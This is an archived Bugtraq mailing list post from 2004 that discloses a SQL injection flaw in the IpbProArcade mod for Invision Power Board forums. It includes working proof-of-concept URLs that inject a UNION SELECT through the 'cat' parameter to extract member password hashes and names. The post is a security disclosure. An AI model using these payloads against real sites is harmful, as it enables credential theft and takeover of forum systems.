Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

IpbProArace 2.5.x SQL injection.
From: axl daivy <axlownz () gmail com>
Date: 20 Nov 2004 20:05:53 -0000


i have found an sql injection in the popular ipbproarcade mod for ipb systems (1.x and 2.x)

the vuln exists in the "category" field.
buy using this field it is possible to inject any sql query and compemise the entire forum system

p.o.c

for ipb 1.x

http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

for ipb 2.x

index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

discovered by Axl
credit goes to HLL for Helping me write the actual exploit
greetz to CereBrums And JonJon

cheers
Axl

  By Date           By Thread  

Current thread:
  • IpbProArace 2.5.x SQL injection. axl daivy (Nov 20)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]